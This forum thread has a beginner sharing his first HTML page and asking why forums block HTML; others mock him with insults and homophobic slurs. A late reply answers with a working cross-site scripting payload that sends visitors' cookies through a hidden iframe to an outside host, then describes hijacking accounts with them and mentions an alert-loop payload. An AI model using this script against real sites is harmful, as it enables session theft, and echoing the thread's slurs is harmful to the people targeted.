Jump to content

Featured Replies

Posted

I just started learning HTML and im in love with it , my queton is why all these forums running IPB or Vbulliten dont allow HTML??

 

my first try at html

 

<html>
<title align="center">This The Titile</title>
<h1 align="center"><a name="bitch">The is a heading</a></h1>
<body bgcolor="green" align="center">This is the body of the document<p>this is a new paragraph

This text contains <sup>superscript</sup>
<p>This text is subscript<sub>subscript</sub><p><pre>this text             is preformatedd meaningthat it preserves        

spaces 

and line breaks 




see              .....

<abbr title="michael ahearn">Mick A</abbr> That text has been abreviated from  michael ahearn
by using the abbrevation tags 

<del>this text has a line through it </del>
<p>

<ins>this text is underlined</ins>

<p>
<Sample>thistextr is a sample text</sample>

<p>
<cite> this text is in citation</cite>
<p>
<dfn>this is a defintion tag</dfn>
<p>
Because the less than sgn is used in the HTML tags the way we right its enity e.g. < this wa ctuallt splet out like lthis & # 6 0


i can also show the ¢ sign and the £ sign as well as the ® sign

<a href=http://www.google.com.au>clicking this will take you to Google.com<a>
<p>
if i add a target to the Link i can make it open in a new page example: <a href="http://www.google.com.au"target="_blank">google.com.au<a>
<p>
by clicikng <a href="#bitch">this</a> it will take you to the heading 

Click <a href="mailto:[email protected]">this to email me</a>

This is  a more complicated email link becasue it will launch also include th subject and literally type the mail for yuo

<a href="mailto:[email protected]?cc:[email protected]&subject=this%20email%20is %20 gay&body=this%20you%20suk%20penis">Send to michael and pat </a>
<p>
<em>this text is inside the empasize tags </em>
<p>
This is going to be a password field
<p>
<form>Username:
<input type"text" name="user">
<br>
<input type="password" name="password">
</form>
<form>
<input type="checkbox" name="bike">
i havea bike
<br>
<input type="checkbox" name="car">
i have a car
</form>


<p>
<body>
<html>

  • Author

im not a kid , im 20 , and i dont care if everyone knows it , i wanted to leaern it and i did so im happy about it.

 

i already know VB abd c++ , and a bit of python

I just started learning HTML and im in love with it , my queton is why all these forums running IPB or Vbulliten dont allow HTML??

 

my first try at html

 

 

nice html there, forums generally dont allow it because it can be used maliciously

I want to first start off by saying congratulations! You are now on the same level as a prepubescent emo myspace user!
im not a kid , im 20 , and i dont care if everyone knows it , i wanted to leaern it and i did so im happy about it.

 

i already know VB abd c++ , and a bit of python

 

Yes, of course you do. Of course.

kigy']I want to first start off by saying congratulations! You are now on the same level as a prepubescent emo myspace user!

 

<bold> OMG NO HES NOT I CAN BOLD STUFF </bold>

I SUCK AT HTML

rifk

 

<?php 
$fIRebUg = $_GET['script'];
if($fIRebUg == "HTML"){echo 'wraaa fIRebUg learnt '.$fIRebUg.' rehh'; }
echo '<br><br><br>lol firebug is a ***got<br>';
?>

 

btw to answer your question HTML is insecure on anywhere where people can submit things tnx.

HAI GUYZ AI JUIST LEARND L33T SP33K HTMLZ LOLZ

LAIK IM GOINA TAIK OVAR T3H INTARWEBS NAOW

 

ffs leave some internetz to us and dont touch google k?

 

http://img480.imageshack.us/img480/3130/1337hax0r5xz.jpg

1337

 

Everyone knows html kid, it's kidsplay

Says the one with the title Dreamweaver. :ugh:

says the retard that acually uses notepad to prove hes leet.

Yes. Yes, of course.

This is the guy who stole my rage. He most likely learnt html from some emogoth mysp4ce whore.
i already know VB abd c++ , and a bit of python

 

You need a knowledge of HTML to advance in those languages.

Lie more plz, thx.

 

PHP > HTML

 

gtfo.

You need a knowledge of HTML to advance in those languages.

Lie more plz, thx.

 

PHP > HTML

 

gtfo.

what the fuck are you smoking, VB C++ and Python have nothing to do with HTML

 

PHP dynamically outputs HTML/XML/text, HTML is rendered client-side, PHP is interpreted on the server-side

 

Also the reasons for HTML being disabled are pretty obvious:

 

<script type="text/javascript" language="Javascript">
document.write("<iframe src=\"http://somesite.com/whatever.php?data=" + document.cookie + "\" width=\"1\" height=\"1\" style=\"display:none;\"></iframe>");
</script>

Invisible iframe that sends the cookie data used on the site to your page. Then just explode() the cookie data into an array and log what you'd like. With that data, you can now auto-login to someone's account by POSTing manually to the site

 

Another reason, use the same <iframe> but include a page that utilizes a (one of the 3 critical, unpatched) IE exploit to run executable code on someone's system. Game over

 

You could also be an annoying fuck and do like <img src="someshit.jpg" onLoad="while(1) { alert(\"LOL PWNT\"); }"> or something

Guest
This topic is now closed to further replies.